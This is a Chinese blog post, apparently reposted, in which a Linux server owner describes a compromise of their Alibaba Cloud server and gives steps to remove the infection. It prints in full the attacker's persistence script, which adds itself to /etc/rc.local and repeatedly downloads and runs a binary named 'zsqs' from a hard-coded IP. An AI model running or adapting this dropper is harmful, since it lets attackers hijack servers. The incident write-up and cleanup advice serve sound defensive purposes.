垃圾脚本黑我linux服务器 |
您所在的位置:网站首页 › windows启动服务脚本 › 垃圾脚本黑我linux服务器 |
标签:kill microsoft 启动 continue led wget 脚本 etc oca 今天接到短信 阿里云Linux服务器被黑 脚本写的也挺容易看懂的: echo "sh /etc/chongfu.sh &" >> /etc/rc.local : 开机自启动自动下载 ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) 找zsqs有多少个,kill 防止启动多个实例
#!/bin/bash #Welcome like-minded friends to come to exchange.#We are a group of people who have a dream.# qun:10776621# 2016-06-14if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then echo ""else echo "sh /etc/chongfu.sh &" >> /etc/rc.localfiwhile [ 1 ]; do Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) if [[ $Centos_sshd_killn -eq 0 ]]; then if [ ! -f "/tmp/zsqs" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget #./wget -P . http://61.147.198.172/zsqs ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null chmod 755 /tmp/zsqs rm wget -rf else echo "No wget" fi fi /tmp/zsqs & #./zsqs & elif [[ $Centos_sshd_killn -gt 1 ]]; then for killed in $(ps aux | grep "zsqs" | grep -v grep | awk ‘{print $2}‘); do Centos_sshd_killn=$(($Centos_sshd_killn-1)) if [[ $Centos_sshd_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi Centos_ssh_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) if [[ $Centos_ssh_killn -eq 0 ]]; then if [ ! -f "/tmp/zsqs" ]; then if [ -f "/usr/bin/wget" ]; then cp /usr/bin/wget . chmod +x wget #./wget -P . http://61.147.198.172/zsqs ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null chmod 755 /tmp/zsqs rm wget -rf else echo "No wget" fi fi /tmp/zsqs & #./zsqs & elif [[ $Centos_ssh_killn -gt 1 ]]; then for killed in $(ps aux | grep "zsqs" | grep -v grep | awk ‘{print $2}‘); do Centos_ssh_killn=$(($Centos_ssh_killn-1)) if [[ $Centos_ssh_killn -eq 1 ]]; then continue else kill -9 $killed fi done else echo "" fi sleep 600done简单解决步骤: 1. 结束进程 ps aux | grep "zsqs" | grep -v grep | awk ‘{print $2}‘| xargs kill -92. 清除自动启动脚本 vim /etc/rc.local 去掉 sh /etc/chongfu.sh &3. 清除 脚本 rm -rf /etc/chongfu.sh /tem/chongfu.sh /tmp/zsqs4. 修改登录密码passwd5.重启。 reboot
存在风险 : zsqs是可执行文件 不知道有没有 替换果我的系统文件 或者执行过隐藏启动命令 在排查吧 今天就到这儿了
垃圾脚本黑我linux服务器 标签:kill microsoft 启动 continue led wget 脚本 etc oca 原文地址:http://www.cnblogs.com/wangdaijun/p/6002429.html |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |